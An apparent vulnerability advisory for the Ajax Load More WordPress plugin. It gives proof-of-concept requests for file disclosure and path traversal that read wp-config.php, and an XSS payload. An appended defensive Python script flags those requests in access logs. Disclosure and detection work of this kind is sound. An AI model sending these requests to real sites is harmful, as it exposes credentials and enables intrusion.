
@Xib3rR4dAr
Last active August 21, 2022 13:38
Ajax Load More <= 5.5.3 Multiple Vulnerabilities

Authenticated Information Disclosure / Local File Disclosure:

The "ajax-load-more-repeaters" AJAX action is vulnerable to Full Path Disclosure, since the full filesystem path of a webserver file is visible in the request. An arbitrary filename can be supplied via the "alm_repeaters_export" parameter to view that file's contents. PoC for reading the WordPress configuration file:

POST /wp-admin/admin.php?page=ajax-load-more-repeaters
alm_repeaters_export=/var/www/html/wp-config.php

LFD vulnerable file: admin/admin.php

Authenticated Cross-Site Scripting:

PoC:

/wp-admin/admin-ajax.php?action=alm_get_tax_terms&taxonomy=post_tag&index=1"><script>alert(1)</script>&nonce={nonce}

The "index" parameter is not properly sanitized. Vulnerable file: admin/admin.php

Authenticated Path traversal to arbitrary file read:

PoC:

/wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../../../wp-config.php&custom=true&alias=&nonce={nonce}
/wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../wp-config&alias=&nonce={nonce}

Vulnerable file: admin/admin.php
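As an added example (not part of the original advisory), a defender-side log check: a Python script that scans constructed web-server access-log lines for the admin-ajax request patterns described above. It assumes the log is in the common combined format and that a legitimate "index" value is numeric (as in the PoC's `index=1` prefix); a POST body such as `alm_repeaters_export` is not recorded in a standard access log, so that case needs request-body logging or a WAF rule instead.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not from the advisory): the first and third
# mirror the PoC URLs, the second is a benign call, the fourth is a POST whose body
# (alm_repeaters_export) a standard access log does not record.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Aug/2022:13:38:01 +0000] "GET /wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../../../wp-config.php&custom=true&alias=&nonce=abc HTTP/1.1" 200 512
203.0.113.5 - - [21/Aug/2022:13:38:02 +0000] "GET /wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=default&alias=&nonce=abc HTTP/1.1" 200 512
203.0.113.6 - - [21/Aug/2022:13:38:03 +0000] "GET /wp-admin/admin-ajax.php?action=alm_get_tax_terms&taxonomy=post_tag&index=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E&nonce=abc HTTP/1.1" 200 90
203.0.113.7 - - [21/Aug/2022:13:38:04 +0000] "POST /wp-admin/admin.php?page=ajax-load-more-repeaters HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(GET|POST) (\S+) HTTP/[\d.]+"')

def classify_request(target: str):
    """Return a reason string if the request target matches an advisory pattern, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(parts.query)  # percent-decodes values, e.g. %3Cscript%3E
    action = params.get("action", [""])[0]
    if action == "alm_get_layout":
        for value in params.get("type", []):
            # normalise separators, then look for a parent-directory segment
            if ".." in value.replace("\\", "/").split("/"):
                return "alm_get_layout: traversal in type parameter"
    if action == "alm_get_tax_terms":
        for index in params.get("index", []):
            if not index.isdigit():  # assumption: a legitimate index is numeric
                return "alm_get_tax_terms: non-numeric index (possible XSS)"
    return None

def scan_log(text: str):
    """Return (client_ip, reason) for every log line matching an advisory pattern."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, _method, target = m.groups()
        reason = classify_request(target)
        if reason:
            hits.append((ip, reason))
    return hits

if __name__ == "__main__":
    for ip, reason in scan_log(SAMPLE_LOG):
        print(ip, reason)
```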
